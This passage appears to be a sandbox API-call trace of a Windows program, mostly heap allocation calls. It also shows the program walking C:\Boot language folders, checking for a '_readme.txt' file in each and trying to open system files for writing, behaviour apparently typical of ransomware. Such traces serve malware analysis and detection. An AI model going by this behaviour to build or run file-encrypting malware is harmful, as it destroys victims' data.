Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.262] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0097.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.262] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.262] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.262] PathFindFileNameW (pszPath="") returned="" [0097.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.262] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.263] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.263] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0097.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.263] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b78ec8 [0097.263] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.263] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0097.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.264] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.264] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0097.264] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a944e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.265] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned=".txt" [0097.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.265] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a944e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.265] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.265] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.265] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.269] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0097.269] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.269] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.269] PathFindFileNameW (pszPath="") returned="" [0097.269] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.270] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.270] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.270] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.270] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0097.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.270] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0097.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 